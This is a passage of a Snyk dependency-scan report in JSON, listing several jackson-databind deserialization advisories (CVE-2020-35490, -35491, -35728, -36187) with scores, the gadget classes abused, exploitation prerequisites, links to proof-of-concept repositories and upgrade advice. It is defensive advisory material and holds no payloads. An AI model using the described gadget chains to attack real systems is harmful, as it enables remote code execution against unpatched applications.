- }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-04T15:22:52Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:14.249736Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.6.7.4" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052449", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:42.491903Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.926544Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:26.923105Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35490" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:37:26.422837Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:32:48Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:26.923105Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1052450", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Not Defined", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2986", - "title": "GitHub Issue" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:55:38.762302Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:38.975620Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:50:57.453912Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2986)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35491" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-18T11:40:53.658144Z", - "functions_new": [ - { - "version": [ - "[,2.10.0.pr1)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-18T11:40:13Z", - "exploitDetails": { - "sources": [], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Not Defined", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-18T16:33:11Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:50:57.453912Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1054588", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "credit": [ - "bu5yer" - ], - "semver": { - "vulnerable": [ - "[2.0.0, 2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2999", - "title": "GitHub Issue" - }, - { - "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Post" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-35728", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "SUSE", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "cvssV3BaseScore": 7.3, - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:58:43.478254Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", - "assigner": "SUSE", - "severity": "high", - "baseScore": 7.3, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:49:38.478896Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.576739Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.852735Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool` (aka embedded Xalan in `org.glassfish.web/javax.servlet.jsp.jstl`).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", - "epssDetails": { - "percentile": "0.80006", - "probability": "0.00674", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-35728" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2020-12-27T14:34:18.527699Z", - "functions_new": [ - { - "version": [ - "[2.0.0, 2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2020-12-27T14:05:38Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Proof of Concept", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2020-12-27T17:34:55Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.852735Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Unproven", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", - "title": "GitHub Commit" - }, - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2997", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - } - ], - "cvssDetails": [ - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.093517Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:01.748169Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:23.768509Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", - "epssDetails": { - "percentile": "0.66225", - "probability": "0.00262", - "modelVersion": "v2023.03.01" - }, - "identifiers": { - "CVE": [ - "CVE-2020-36187" - ], - "CWE": [ - "CWE-502" - ] - }, - "packageName": "com.fasterxml.jackson.core:jackson-databind", - "proprietary": false, - "creationTime": "2021-01-07T12:47:33.579319Z", - "functions_new": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "className": "com.fasterxml.jackson.databind.ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "alternativeIds": [], - "disclosureTime": "2021-01-07T12:44:41Z", - "exploitDetails": { - "sources": [ - "Snyk" - ], - "maturityLevels": [ - { - "type": "secondary", - "level": "Not Defined", - "format": "CVSSv3" - }, - { - "type": "primary", - "level": "Proof of Concept", - "format": "CVSSv4" - } - ] - }, - "packageManager": "maven", - "mavenModuleName": { - "groupId": "com.fasterxml.jackson.core", - "artifactId": "jackson-databind" - }, - "publicationTime": "2021-01-07T16:40:33.970819Z", - "severityBasedOn": "CVSS", - "modificationTime": "2024-03-11T09:51:23.768509Z", - "socialTrendAlert": false, - "severityWithCritical": "high", - "from": [ - "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", - "com.fasterxml.jackson.core:jackson-databind@2.6.5" - ], - "upgradePath": [ - false, - "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" - ], - "isUpgradable": true, - "isPatchable": false, - "name": "com.fasterxml.jackson.core:jackson-databind", - "version": "2.6.5" - }, - { - "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", - "title": "Deserialization of Untrusted Data", - "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "credit": [ - "Unknown" - ], - "semver": { - "vulnerable": [ - "[,2.9.10.8)" - ] - }, - "exploit": "Proof of Concept", - "fixedIn": [ - "2.9.10.8" - ], - "patches": [], - "insights": { - "triageAdvice": null - }, - "language": "java", - "severity": "high", - "cvssScore": 8.1, - "functions": [ - { - "version": [ - "[,2.9.10.8)" - ], - "functionId": { - "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", - "className": "ObjectMapper", - "functionName": "enableDefaultTyping" - } - } - ], - "malicious": false, - "isDisputed": false, - "moduleName": "com.fasterxml.jackson.core:jackson-databind", - "references": [ - { - "url": "https://github.com/FasterXML/jackson-databind/issues/2998", - "title": "GitHub Issue" - }, - { - "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", - "title": "Medium Article" - }, - { - "url": "https://github.com/Al1ex/CVE-2020-36184", - "title": "PoC" - } - ], - "cvssDetails": [ - { - "assigner": "Red Hat", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "assigner": "NVD", - "severity": "high", - "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "cvssV3BaseScore": 8.1, - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "cvssSources": [ - { - "type": "primary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", - "assigner": "Snyk", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-06T13:59:37.169091Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "Red Hat", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:48:47.820867Z" - }, - { - "type": "secondary", - "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", - "assigner": "NVD", - "severity": "high", - "baseScore": 8.1, - "cvssVersion": "3.1", - "modificationTime": "2024-03-11T09:51:24.700251Z" - } - ], - "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows 